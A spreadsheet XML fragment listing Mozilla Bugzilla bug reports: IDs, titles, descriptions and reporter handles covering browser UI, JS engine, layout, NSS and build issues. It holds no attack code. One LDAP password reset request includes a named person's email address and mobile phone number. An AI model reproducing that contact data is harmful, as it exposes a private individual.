    <t>Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9b3pre) Gecko/2008012811 Minefield/3.0b3pre ID:2008012811
1. New profile start firefox
2. Tools &gt; Add-ons &gt; Get-Addons
3. Search for something that returns so many results it times out eg: 'bookmark'
4. Search should time out with error message Minefield couldn't retrieve add-ons
Expected:
- Button to dismiss error message reads OK
Actual:
- Button to dismiss error message reads Cancel (which doesn't make much sense to me).</t>
  </si>
  <si>
    <t>dtownsend</t>
  </si>
  <si>
    <t>CORE-276061</t>
  </si>
  <si>
    <t>bogus js_ValueToInt32 calls in jsexn.c plus recent regressions</t>
  </si>
  <si>
    <t>The js_ValueToInt32 calls were old but cloning one into the fix for bug 243869
made the test URL worse.  Fixing these to use js_ValueToECMAUint32 reveals other
problems:
1. bytes is reassigned badly in the new code in js_ReportUncaughtException
clobbering the original bytes value that comes from converting the exception to
a string.
2. The recovery of message filename and lineno from exnObject in that function
should be predicated on the exnObject being an instance of *Error.  If it's just
a plain object (throw {}) there's no point groveling around in it for
properties that weren't set and losing the useful uncaught exception error.
/be</t>
  </si>
  <si>
    <t>CORE-278262</t>
  </si>
  <si>
    <t>JAR URIs should resolve relative URIs in the base section</t>
  </si>
  <si>
    <t>When dealing with bug 246209 and my semi-annual chrome registry whacking I
found that JAR URIs cannot contain a relative path component in the first part
of the URI: i.e.
jar:../relative/path.jar!/path/inside
This isn't that hard to fix and it makes life a lot less hectic for the chrome
registry. Patch forthcoming.</t>
  </si>
  <si>
    <t>THUNDERBIRD-254101</t>
  </si>
  <si>
    <t>Account Manager</t>
  </si>
  <si>
    <t>ISP RDF functionality broken</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7) Gecko/20040802 Firefox/0.9.1+
Build Identifier: 
It seems that in the last two weeks or so the functionality behind the
defaults/isp rdf entries has been broken.  RDF entries that have worked for a
number of versions are now failing to show any additional screens after
selecting them and then create a blank account with no options.  I am using a
custom RDF file for our purposes but the same problem rings true with the
aol.rdf file provided.
Reproducible: Always
Steps to Reproduce:
1. Toss aol.rdf into your defaults/isp folder alongside rss.rdf
2. add a new account
3. select AOL account
4. Hit next
Actual Results:  
The wizard will immediately exit and create a blank AOL account which neither
has the expected settings in it nor does it even have the account preference
subcategories with which one could edit the preferences after adding.
Expected Results:  
The wizard should go through another screen where it requests realname and
username and then create a fully-functional aol imap account.
I am using a custom RDF file for our purposes but the same problem rings true
with the aol.rdf file provided.</t>
  </si>
  <si>
    <t>jackw</t>
  </si>
  <si>
    <t>CORE-58103</t>
  </si>
  <si>
    <t>XUL documents can't create DOM ranges</t>
  </si>
  <si>
    <t>I needed some DOMRange stuff in XUL documents for some drag &amp; drop work I'm
doing for the tip.
I implemented it so I'm attaching a patch. it's real simple and it works.
Hoping hyatt &amp; waterson agree..</t>
  </si>
  <si>
    <t>CORE-173299</t>
  </si>
  <si>
    <t>change getControlleryById  to getControllerById  in nsIControllersInterface</t>
  </si>
  <si>
    <t>controllerybyid
/content/xul/document/public/nsIControllers.idl line 65 -- nsIController
getControlleryById(in unsigned long controllerID)
/content/xul/document/src/nsXULControllers.cpp line 263 -- /* nsIController
getControlleryById (in unsigned long controllerID) */
/content/xul/document/src/nsXULControllers.cpp line 265 --
nsXULControllers::GetControlleryById(PRUint32 controllerID nsIController **_retval)
controllerbyid
/editor/ui/composer/content/ComposerCommands.js line 271 -- // (XXX We should
add an nsIEditorSession methods to get them via nsIController::GetControllerByID()
/editor/ui/composer/content/editor.js line 329 -- var controller =
window.controllers.getControllerById(gComposerWindowControllerID)</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-654614</t>
  </si>
  <si>
    <t>Redirect blocklist page to AMO</t>
  </si>
  <si>
    <t>Our new blocklist page is now live at https://addons.mozilla.org/blocked and Firefox 6+ will use it to point to specific details of each block entry instead of the list of everything we've ever blocked.
This is a huge improvement for users and also for us as we don't have to make separate changes to mozilla.com and wait for them to be pushed they are updated automatically as part of the block.
Please redirect all requests to mozilla.com/blocklist to https://addons.mozilla.org/blocked
Thanks</t>
  </si>
  <si>
    <t>jlong</t>
  </si>
  <si>
    <t>CORE-292971</t>
  </si>
  <si>
    <t>Sort out the progress listener story with fastback/bfcache</t>
  </si>
  <si>
    <t>We need to sort out what happens with progress listeners on fastback/bfcache. 
Having everyone who currently listens to progress listeners for page loads go
through the contortions that the Firefox password manager goes through in the
patch from bug 274784 is not cool.  Right now all you have to do is get a
service or reference to a docshell and register yourself with it to watch all
document loads (globally and in that docshell respectively) whatever we do
should be roughly equivalent in complexity for the consumer.
I still think the simplest solution is to push the mChannel on documents up to
nsDocument (from HTML/XMLDocument) and call OnStateChange with this channel as
the request.  A minor tweak to docshell to prevent onload firing when we do this
should be pretty straightforward.
If we decide not to do this then we should either add some notifications to
nsIWebProgressListener2 (preferred) or create a new interface for this...</t>
  </si>
  <si>
    <t>CORE-452062</t>
  </si>
  <si>
    <t>Border corners missing in print preview and in print output if the border is not monochrome</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9.1a2pre) Gecko/2008082421 Firefox/3.1a2pre
Build Identifier: 
If a border is not monochrome border corners are missing in print preview and in print output on Windows.
Last good: 2008-07-23
First bad: 2008-07-24
Presumably a regression from the changes to the way the borders are drawn in bug 424423. A testcase follows.
Reproducible: Always
Steps to Reproduce:
1. Open the testcase
2. File -&gt; Print Preview or print the page directly.
Actual Results:  
In the first two cases the borders have no corners.
Expected Results:  
All corners are drawn in print preview and when printed like in case 3.
The issue could be reproduced by Sascha Grage and Tobias Fischer on de.comm.software.mozilla.nightly-builds f.e. for Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.1a2pre) Gecko/20080825002620 Mnenhy/0.7.5.20005 SeaMonkey/2.0a1pre</t>
  </si>
  <si>
    <t>bugzilla.i.sekler</t>
  </si>
  <si>
    <t>CORE-134962</t>
  </si>
  <si>
    <t>REMINDER: check talkbacks and remove temporary code added for bug 118014</t>
  </si>
  <si>
    <t>This code needs to be removed once it is no longer needed to analyze the bug
reported in bug 118014:
          // DIAGNOSTIC CHECK: bug 118014 tracks a topcrash coming out of this
call. The following
          // code to discriminate beween HTML and non HTML is an attempt to
better understand
          // what kind of element is causing the crash since it cannot so far
be reproduced in a
          // debugging environment. (temporary: 04.02.2002 attinasi@netscape.com)
          nsIContent *theContent = undisplayed-&gt;mContent
          if (theContent-&gt;IsContentOfType(nsIContent::eHTML)) {
            // HTML element
            aPresContext-&gt;ResolveStyleContextFor(theContent newContext 
          } else {
            // non-HTML element (probably XUL)
            aPresContext-&gt;ResolveStyleContextFor(theContent newContext 
          }</t>
  </si>
  <si>
    <t>attinasi_layout</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-285418</t>
  </si>
  <si>
    <t>Fixes for packaging script</t>
  </si>
  <si>
    <t>* Take version from Makefile
* Add xforms.js and stage dir. to clean up routine</t>
  </si>
  <si>
    <t>CORE-523229</t>
  </si>
  <si>
    <t>rename ClearDepthf/DepthRangef to get rid of f suffix</t>
  </si>
  <si>
    <t>Created attachment 407129
no f
It's sans-f in the spec.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-333553</t>
  </si>
  <si>
    <t>set up replacement linux perf testing tinderboxes</t>
  </si>
  <si>
    <t>gtk1 and probably gcc 2.95 support will becoming obsolete pretty soon so we need some replacements for tinderboxes. The affected tinderboxes that I know of are:
balsa (Firefox) - running leak tests
btek (SeaMonkey) - running Tp
luna (SeaMonkey) - running basically every perf test
The difficulty is that the replacements need to be gtk2/gcc3 and need to give stable numbers.  My naiive attempt can be seen on http://tinderbox.mozilla.org/showbuilds.cgi?tree=Firefox-Cairo with the linux-perf box I made no attempt to disable daemons and other non-essential services there.</t>
  </si>
  <si>
    <t>BUGZILLA-485099</t>
  </si>
  <si>
    <t>Write a script to do release website work</t>
  </si>
  <si>
    <t>Created attachment 369194
WIP v1
I'm writing a script that will do as much of the work for a set of releases as can be done by a script. It will update web pages tag releases do tarballs and maybe more. (Those three things may all be done by separate scripts we'll see.)
The web part works by creating a template toolkit parser that can create template-toolkit templates. :-) So far it can create an index page for a release and the release notes for a 3.x release.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-999816</t>
  </si>
  <si>
    <t>Server Operations: MOC</t>
  </si>
  <si>
    <t>wap206.ops.mtv2.mozilla.net is UNREACHABLE: PING CRITICAL - Packet loss = 100%</t>
  </si>
  <si>
    <t>Automated alert report from nagios1.private.scl3.mozilla.com:
Hostname: wap206.ops.mtv2.mozilla.net
State:    UNREACHABLE
Output:   PING CRITICAL - Packet loss = 100%</t>
  </si>
  <si>
    <t>nagiosapi</t>
  </si>
  <si>
    <t>CORE-312055</t>
  </si>
  <si>
    <t>[@ nsPresContext::GetContainerInternal]</t>
  </si>
  <si>
    <t>Incident ID: 10512762
Stack Signature	nsPresContext::GetContainerInternal() ed52d7eb
Email Address	
Product ID	FirefoxTrunk
Build ID	2005101104
Trigger Time	2005-10-11 05:08:15.0
Platform	LinuxIntel
Operating System	Linux 2.6.14-rc4-g907a4261
Module	firefox-bin + (001ccf2f)
URL visited	http://www.ghcc.msfc.nasa.gov/GOES/ (running a java applet)
User Comments	See my addendum to bug #309986. I think this crash is related to
Boris's fix for that bug. I was running a java applet in one tab and I just
finished submitting my addendum to the bug report in a second tab and clicked on
Back to bug#309986 when
Since Last Crash	0 sec
Total Uptime	0 sec
Trigger Reason	SIGSEGV: Segmentation Fault: (signal 11)
Source File Line No.
/builds/tinderbox/Fx-Trunk/Linux_2.4.21-27.0.4.ELsmp_Depend/mozilla/layout/base/nsPresContext.cpp
line 208
Stack Trace 	
nsPresContext::GetContainerInternal() 
[/builds/tinderbox/Fx-Trunk/Linux_2.4.21-27.0.4.ELsmp_Depend/mozilla/layout/base/nsPresContext.cpp
line 208]
nsPluginInstanceOwner::ShowStatus() 
[/builds/tinderbox/Fx-Trunk/Linux_2.4.21-27.0.4.ELsmp_Depend/mozilla/layout/generic/nsObjectFrame.cpp
line 336]
nsPluginInstanceOwner::ShowStatus() 
[/builds/tinderbox/Fx-Trunk/Linux_2.4.21-27.0.4.ELsmp_Depend/mozilla/layout/generic/nsObjectFrame.cpp
line 2307]
nsPluginInstancePeerImpl::ShowStatus() 
[/builds/tinderbox/Fx-Trunk/Linux_2.4.21-27.0.4.ELsmp_Depend/mozilla/modules/plugin/base/src/nsPluginInstancePeer.cpp
line 297]
libjavaplugin_oji.so + 0x20a0d (0xb4d15a0d)
libjavaplugin_oji.so + 0x1f00b (0xb4d1400b)
libjavaplugin_oji.so + 0x1eea7 (0xb4d13ea7)
libjavaplugin_oji.so + 0x19b34 (0xb4d0eb34)
handleRunnableEvent() 
[/builds/tinderbox/Fx-Trunk/Linux_2.4.21-27.0.4.ELsmp_Depend/mozilla/modules/oji/src/nsJVMManager.cpp
line 305]
PL_HandleEvent() 
[/builds/tinderbox/Fx-Trunk/Linux_2.4.21-27.0.4.ELsmp_Depend/mozilla/xpcom/threads/plevent.c
line 689]
PL_ProcessPendingEvents() 
[/builds/tinderbox/Fx-Trunk/Linux_2.4.21-27.0.4.ELsmp_Depend/mozilla/xpcom/threads/plevent.c
line 623]
nsEventQueueImpl::ProcessPendingEvents() 
[/builds/tinderbox/Fx-Trunk/Linux_2.4.21-27.0.4.ELsmp_Depend/mozilla/xpcom/threads/nsEventQueue.cpp
line 423]
event_processor_callback() 
[/builds/tinderbox/Fx-Trunk/Linux_2.4.21-27.0.4.ELsmp_Depend/mozilla/widget/src/gtk2/nsAppShell.cpp
line 67]
libglib-2.0.so.0 + 0x476fd (0xb79696fd)
libglib-2.0.so.0 + 0x2315f (0xb794515f)
libglib-2.0.so.0 + 0x24152 (0xb7946152)
libglib-2.0.so.0 + 0x2448b (0xb794648b)
libglib-2.0.so.0 + 0x24a01 (0xb7946a01)
libgtk-x11-2.0.so.0 + 0x112833 (0xb7bdb833)
nsAppShell::Run() 
[/builds/tinderbox/Fx-Trunk/Linux_2.4.21-27.0.4.ELsmp_Depend/mozilla/widget/src/gtk2/nsAppShell.cpp
line 141]
nsAppStartup::Run() 
[/builds/tinderbox/Fx-Trunk/Linux_2.4.21-27.0.4.ELsmp_Depend/mozilla/toolkit/components/startup/src/nsAppStartup.cpp
line 162]
XRE_main() 
[/builds/tinderbox/Fx-Trunk/Linux_2.4.21-27.0.4.ELsmp_Depend/mozilla/toolkit/xre/nsAppRunner.cpp
line 2291]
main() 
[/builds/tinderbox/Fx-Trunk/Linux_2.4.21-27.0.4.ELsmp_Depend/mozilla/browser/app/nsBrowserApp.cpp
line 62]
libc.so.6 + 0x150da (0xb747c0da)</t>
  </si>
  <si>
    <t>CORE-156902</t>
  </si>
  <si>
    <t>Extremely unreadable code</t>
  </si>
  <si>
    <t>Below is a piece of code from nsRuleNode.h that I stumbled upon and had a hard
time to read: Typecasting this to char* and adding an offset for accessing
members is very evil. At the very least a better documentation would be in
order. The best thing is the NOTE: guess what the note says in
nsStyleContext::SetStyle!
nsStyleStruct* CachedStyleData::GetStyleData(const nsStyleStructID&amp; aSID) {
    // NOTE:  nsStyleContext::SetStyle works roughly the same way.
    const StyleStructInfo
    char* resetOrInheritSlot = NS_REINTERPRET_CAST(char* this) +
info.mCachedStyleDataOffset
    char* resetOrInherit = NS_REINTERPRET_CAST(char*
*NS_REINTERPRET_CAST(void** resetOrInheritSlot))
[...]</t>
  </si>
  <si>
    <t>CORE-406877</t>
  </si>
  <si>
    <t>nsIAccessible::TakeFocus() on links does not set tab order position</t>
  </si>
  <si>
    <t>When an AT sets focus on a link the next tab should move relative to that link. This works for focusable content other than links.</t>
  </si>
  <si>
    <t>BUGZILLA-177828</t>
  </si>
  <si>
    <t>Taint warning from post_bug with perl 5.8</t>
  </si>
  <si>
    <t>As reported on npm.webtools when submitting a new bug using perl 5.8 we get a
taint warning because the multi-arg form for exec considers having tainted
arguments as deprecated.
We already check the values in the cc field + so on for validity as does
processmail so I don't think its a security issue. 
It is something which we should fix though. For the old system that would
havebeen a trick_taint in the loop. Not sure if we can use a similar solution
with match_email but we probably can.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-384457</t>
  </si>
  <si>
    <t>sr / Serbian</t>
  </si>
  <si>
    <t>Firefox productization for Serbian (sr)</t>
  </si>
  <si>
    <t>We need to find a good set of search engines for Serbia as well as a news feed and rss readers.
Filmil any suggestions on those?</t>
  </si>
  <si>
    <t>filmil</t>
  </si>
  <si>
    <t>BUGZILLA-329638</t>
  </si>
  <si>
    <t>https login page switches to http on submit if ssl_redirect = false</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7.12) Gecko/20060202 Fedora/1.0.7-1.2.fc4 Firefox/1.0.7
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7.12) Gecko/20060202 Fedora/1.0.7-1.2.fc4 Firefox/1.0.7
I upgrade from 2.18.4 to Bugzilla 2.20.1 last week and now i have a problem with the new ssl behavior.
We use http/https for connections from intranet and block http via firewall from internet only https is allowed. But we have customers who need to connect with http (didn't accept self signed certificates in proxy configuration) so this customer ip is special configured in the firewall to accept connects with http. 
Until the upgrade all work fine but now i can connect the login page with https and if you submit the login data the submit is send with http that is blocked by the firewall.
I've try parameter sslbase and ssl with several combinations but nothing works. Either it switch at submit from https to http (ssl=never) or i will be redirected to https even if i start the connection with http (ssl=always or auth).
The right behavior for ssl force redirection = never should be that i connect with http and stay at http and if i connect with https i stay at https.
There was a similar bug in 2.16.x if i remember correct.
Reproducible: Always
Steps to Reproduce:
1.connect via https (parameters sslbase=https://bugzilla.mydomain.com/ssl=never)
2.fill out login data and submit
Actual Results:  
get redirected to http
Expected Results:  
stay at https</t>
  </si>
  <si>
    <t>freigang</t>
  </si>
  <si>
    <t>PENELOPE_GRAVEYARD-366051</t>
  </si>
  <si>
    <t>In Compose window with Penelope key bindings Tab key does nothing in To: field</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8.1.1) Gecko/20061222 Firefox/2.0.0.1
Build Identifier: 0.1a9 
Without Penelope extension the Tab key usually auto-completes an address and skips to the next field.
With Penelope extension and Penelope key bindings Tab does nothing.
Even more strangely if Penelope is enabled but uses the Thunderbird key bindings then hitting Tab in the To: field pops up the Attach Files window.
This also occurs if I try to use formatting shortcuts (Ctrl-B Ctrl-I etc.) in the Body.
Reproducible: Always
Steps to Reproduce:
1. File-&gt;New-&gt;Message
2. In To: field hit Tab key
Actual Results:  
Attach Files window pops up
Expected Results:  
Cursor moves to Subject: field
Fedora Core 6
Thunderbird 2.0b1 (2007010403)</t>
  </si>
  <si>
    <t>mcharleb</t>
  </si>
  <si>
    <t>arenamail</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-491162</t>
  </si>
  <si>
    <t>Source Code Analysis</t>
  </si>
  <si>
    <t>Dehydra sometimes misses statement variables</t>
  </si>
  <si>
    <t>Given:
void f() {
  int *x *z
  int y
  if (x + y &gt; z) {}
}
I expect line 4 |if (x + y &gt; z) {}| to contain 3 variables but I only get x and z missing y completely:
{
  statements: [{
    name: x
    type: #2#
    loc: {
      _source_location: 213
      file: /tmp/tmpCNehpQ.cpp
      line: 2
      column: 8
    }
  }
  {
    name: z
    type: #2#
    loc: {
      _source_location: 217
      file: /tmp/tmpCNehpQ.cpp
      line: 2
      column: 12
    }
  }]
  loc: {
    _source_location: 464
    file: /tmp/tmpCNehpQ.cpp
    line: 4
    column: 3
  }</t>
  </si>
  <si>
    <t>david.humphrey</t>
  </si>
  <si>
    <t>CORE-392233</t>
  </si>
  <si>
    <t>Text kerning broken by scaling/viewBox (space between letters or letters above each other)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux x86_64 en-US rv:1.8.1.2) Gecko/20070305 SeaMonkey/1.1.1
Build Identifier: Mozilla/5.0 (X11 U Linux i686 (x86_64) en-US rv:1.9a7) Gecko/2007080209 GranParadiso/3.0a7
See testcases. All should render identically.
Also note that the font size is way too small (should be 10% of the height).
This worked in 1.8.x and a few alphas before the current one.
Reproducible: Always
Steps to Reproduce:
1. Load testcases
Actual Results:  
Space between letters resp. letters above each other
Expected Results:  
Normal text</t>
  </si>
  <si>
    <t>x00000000</t>
  </si>
  <si>
    <t>CORE-524421</t>
  </si>
  <si>
    <t>input[type=file] has a file even if empty</t>
  </si>
  <si>
    <t>Created attachment 408333
proposed fix
A file input control contains one file even if none have been chosen. Presumably this was to clear the textbox of the control but it's unnecessary. It also results in:
* (javascript) target.files.length = 1
* an empty file being sent over HTTP (although IE and Webkit also do this)</t>
  </si>
  <si>
    <t>CORE-368869</t>
  </si>
  <si>
    <t>Make cycle collection suspect all native wrapper roots</t>
  </si>
  <si>
    <t>Created attachment 253502
simple implementation of strategy to suspect all native wrappers
Eliminate a form of cycle-collection failure induced by a race (not related to threads) between the collector and dropping edges in script code as described in the bug 368530 comment 21.</t>
  </si>
  <si>
    <t>CORE-196795</t>
  </si>
  <si>
    <t>make HTMLDocumentColorRule immutable</t>
  </si>
  <si>
    <t>We should make the HTMLDocumentColorRule immutable.  (I was thinking this might
fix bug 90194 but then I realized the problem there is much deeper.)  However
this patch is good since we want to move towards rule immutability.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-186015</t>
  </si>
  <si>
    <t>brokerage.bankingonline.de - cookies not recognised</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.3a) Gecko/20021210 Phoenix/0.5
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.3a) Gecko/20021210 Phoenix/0.5
This bug's source is the exact same as in bug #171235
https://brokerage.bankingonline.de/mod/WebObjects/nz?style=netbank will set a
cookie whose path is /mod/WebObjects/nz and the site later on tries to access
the cookie from /mod/WebObjects/nz.woa/... which fails (see bug #171235
comments #21 #23)
Reproducible: Always
Steps to Reproduce:
1. Go to URL
Actual Results:  
Site tells that it tried to set a cookie and failed.
Would it make sense to report this problem to Apple? I don't know how many
banking sites use WebObjects and exhibit this 'bug' but somehow WebObjects seems
to facilitate the problem.</t>
  </si>
  <si>
    <t>stmoebius</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-445409</t>
  </si>
  <si>
    <t>utime fails when user running server does not own .po file</t>
  </si>
  <si>
    <t>The otime function called in statsdb.py fails whenever the user calling it (who is running the server) is not the owner of a given .po file.  There do not appear to be any immediate side effects of this but mysterious errors involving TimeCache and expiring started after this error was introduced and may be related.</t>
  </si>
  <si>
    <t>dschafer</t>
  </si>
  <si>
    <t>CORE-341917</t>
  </si>
  <si>
    <t>Garbage painted when page is long enough</t>
  </si>
  <si>
    <t>When the page is long enough it isn't painted properly.
It becomes garbage random parts are painted...
For example https://bugzilla.mozilla.org/show_bug.cgi?id=234455
or http://java.sun.com/j2se/1.5.0/docs/api/allclasses-frame.html
This is on cairo-gtk2 32bit Linux X Window System Version 6.8.2 depth 24</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-497555</t>
  </si>
  <si>
    <t>Searching in Search Tools only searches for search engines and excludes extensions</t>
  </si>
  <si>
    <t>1. Go to https://addons.mozilla.org/firefox/browse/type:4
2. Search for Peers or one of the recommended add-ons.
Actual result: Searching in Search Tools only searches for search engines and excludes extensions
Expected: Include the extensions
The page has Search _Engines_ ... as title.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-134053</t>
  </si>
  <si>
    <t>utf8 conversion problem in nsString.h</t>
  </si>
  <si>
    <t>With the current build surrogate can be displayed correctly on Navigator
window but on mail window it's displayed as a pair of question mark and square
in the subject and displayed as two question marks in mail body.
Two testing mails to follow.</t>
  </si>
  <si>
    <t>shanjian</t>
  </si>
  <si>
    <t>ji</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-210727</t>
  </si>
  <si>
    <t>GFX: Gtk</t>
  </si>
  <si>
    <t>[xft] leak in nsFontMetricsXft::PrepareToDraw</t>
  </si>
  <si>
    <t>Patch forthcoming.
g_malloc
nsFontMetricsXft::PrepareToDraw(nsRenderingContextGTK* nsDrawingSurfaceGTK*
_XftDraw** _XftColor&amp;)
nsFontMetricsXft::DrawString(char const* unsigned int int int const*
nsRenderingContextGTK* nsDrawingSurfaceGTK*)
nsRenderingContextGTK::DrawString(char const* unsigned int int int const*)
nsTextFrame::PaintAsciiText(nsIPresContext* nsIRenderingContext&amp;
nsStyleContext* nsTextFrame::TextStyle&amp; int int)
nsTextFrame::Paint(nsIPresContext* nsIRenderingContext&amp; nsRect const&amp;
nsFramePaintLayer unsigned)
nsContainerFrame::PaintChild(nsIPresContext* nsIRenderingContext&amp; nsRect
const&amp; nsIFrame* nsFramePaintLayer unsigned)
nsBlockFrame::PaintChildren(nsIPresContext* nsIRenderingContext&amp; nsRect
const&amp; nsFramePaintLayer unsigned)
nsHTMLContainerFrame::PaintDecorationsAndChildren(nsIPresContext*
nsIRenderingContext&amp; nsRect const&amp; nsFramePaintLayer int unsigned)
nsBlockFrame::Paint(nsIPresContext* nsIRenderingContext&amp; nsRect const&amp;
nsFramePaintLayer unsigned)</t>
  </si>
  <si>
    <t>SUPPORT.MOZILLA.ORG-413710</t>
  </si>
  <si>
    <t>Knowledge Base Software</t>
  </si>
  <si>
    <t>Article history view does not break lines in the generated html</t>
  </si>
  <si>
    <t>The source output of an article does not use  at the end of the lines which makes everything one large block of text.
Adding white-space:pre in the CSS isn't optimal either because then paragraphs don't wrap.</t>
  </si>
  <si>
    <t>djst</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-336491</t>
  </si>
  <si>
    <t>Clean up abCommon.js</t>
  </si>
  <si>
    <t>There is at least one simple function (GetAbViewURI) that is only called once and actually duplicates the work and just scanning through there are some other potential tidy ups/simplifications that we can do.</t>
  </si>
  <si>
    <t>CORE-514110</t>
  </si>
  <si>
    <t>nanojit: avoid getresv() because it has a redundant test</t>
  </si>
  <si>
    <t>Created attachment 398068
patch
We see this pattern a lot in the Assembler:
    Reservation* resv = getresv(ins)
    NanoAssert(resv)
    ... use resv-&gt;reg etc ...
getresv() is inlined so it becomes this:
    Reservation* resv = ins-&gt;resv()
    resv = (r-&gt;used ? r : 0)
    NanoAssert(resv)
    ... use resv-&gt;reg etc ...
In optimised builds the assert is removed:
    Reservation* resv = ins-&gt;resv()
    resv = (r-&gt;used ? r : 0)
    ... use resv-&gt;reg etc ...
The r-&gt;used test should always succeed (if it doesn't there's a bug which
a debug build should catch).
This patch removes all occurrences of this idiom in Assembler.cpp and
Nativei386.cpp (but not the other back-ends) replacing them with this:
    Reservation* resv = ins-&gt;resv(ins)
    NanoAssert(resv-&gt;used)
    ... use resv-&gt;reg etc ...
thus avoiding the unnecessary test.  (A couple of the modified places didn't have the assertion but the code relied on resv-&gt;used being true.)
Furthermore I introduced resvUsed() which does the assert itself so now 
you actually see this:
    Reservation* resv = ins-&gt;resvUsed(ins)
    ... use resv-&gt;reg etc ...
I also changed other resv = getresv(ins)... if (resv) occurrences to 
resv = ins-&gt;resv()... if (resv-&gt;used) for consistency and readability.
I've run SS several times and am seeing a 0--3ms speedup.  I also checked 
the generated asm and it's several instructions fewer for each occurrence 
and so is a clear win in terms of code size.</t>
  </si>
  <si>
    <t>n.nethercote</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-381356</t>
  </si>
  <si>
    <t>Make it clear that load in background pref only applies to Links opened by Cmd-click</t>
  </si>
  <si>
    <t>Since the load in bg pref only applies to links opened by cmd-clicks (or to other things opened by cmd-click like bookmarks or CM items) we should make it appear indented from the cmd-click pref visually instead of in its own section at the bottom of the pane.
There seems to be a lot of confusion that it applies to links from other apps (I think it used to before those were changed to always open in the fg) and to SWM and people keep thinking shift-click is broken.
It'll be uglier especially with the hint text but it will leave no doubt that the load in bg pref only applies to cmd-clicks.</t>
  </si>
  <si>
    <t>TOOLKIT-382752</t>
  </si>
  <si>
    <t>Give extension manager some xpcshell test love</t>
  </si>
  <si>
    <t>I've been thinking for a while that with some Makefile hacking and reusing the XUL preprocessor on a single install.rdf file we could generate a few test XPI packages.  With those packages we could start writing xpcshell tests for the extension manager.
toolkit/mozapps/extensions/tests/Makefile.in
#ifdef ENABLE_TESTS
libs::
# xul preprocessor for toolkit/mozapps/extensions/tests/files/install.rdf -&gt; dist/xpi-stage/test-em-one/install.rdf
# makexpi packages to _tests/xpcshell-simple/test_extmgr/em-test-one.xpi
#endif
MODULE		= test_extmgr
XPCSHELL_TESTS  = unit
toolkit/mozapps/extensions/tests/files/ would hold the source files for several extensions but only specified files would be preprocessed and included into each XPI.
Thoughts?</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-578352</t>
  </si>
  <si>
    <t>Account Requests</t>
  </si>
  <si>
    <t>Need new LDAP password</t>
  </si>
  <si>
    <t>My LDAP password expired for mark@mozillafoundation.org before I could change it. Can you reset and inform me of the new password? I am msurman on skype or available on mobile at +1 647 401 9579.</t>
  </si>
  <si>
    <t>NSS-298409</t>
  </si>
  <si>
    <t>MSVC debug runtime library assertion failures in crlutil</t>
  </si>
  <si>
    <t>I built NSS_3_10_RTM with NSPR_4_6_RTM using MSVC .NET 2003
(7.1) on Windows XP.  The build described in this bug report
is the OBJ.OBJD build you need to set USE_DEBUG_RTL=1 when
building.
When I run all.sh I get an assertion failure in crlutil from
the MSVC debug runtime library:
    Micrisoft Visual C++ Debug Library
    Debug Error!
    Program: ...1\spdpc1_win2k\mozilla\dist\win954.0_dbg.objd\bin\crlutil.exe
    DAMAGE: after Normal block (#2692) at 0x0055CE50
I can't debug crlutil.exe at this point so I can't get
more information than this.
In my experience such assertion failures report memory
errors such as freeing memory not allocated from the heap
or freeing memory that has already been freed.  So that
would be a good direction to investigate.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-90896</t>
  </si>
  <si>
    <t>There is no option to localize Sender/Recipient in SortBy menu</t>
  </si>
  <si>
    <t>There is no option to localize Sender/Recipient string in SortBy menu it should
be somewhere option to localize this strings. It was in
previous versions of mozilla. Now probably on many localizations there will be
grammar errors.
Probably only in English:
Word Sender/Recipient is the same in phrase Sort by Sender/Recipient and for
example in mail window as Sender of message. But in polish  
sender in phrase Sort by is Nadawcy and in mail window Nadawca as sender
of message. It would be great to add labels sortbysender.label and
sortbyrecipient.label</t>
  </si>
  <si>
    <t>ssu0262</t>
  </si>
  <si>
    <t>mwawoczny</t>
  </si>
  <si>
    <t>MOZILLA.ORG-390498</t>
  </si>
  <si>
    <t>MozillaBuild</t>
  </si>
  <si>
    <t>consider starting ssh-agent automatically in MozillaBuild</t>
  </si>
  <si>
    <t>Created attachment 274811
add ssh-agent to start-msvc*.bat files
CVS interactions in MozillaBuild are easier if you run ssh-agent and then ssh-add your key to it but it would be even easier if ssh-agent was already running and you only had to run ssh-add.  One way to do this is to start ssh-agent before rxvt and then start rxvt as a client of ssh-agent.
I've been running MozillaBuild like this for a while now and I can't detect any issues with it.  Here's a patch to the start-msvc*.bat files that implements it.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-272122</t>
  </si>
  <si>
    <t>Crash in xf:output</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8a6) Gecko/20041126
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8a6) Gecko/20041126
Patch coming.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>CORE-426311</t>
  </si>
  <si>
    <t>report address for live contexts in JS_DestroyRuntime</t>
  </si>
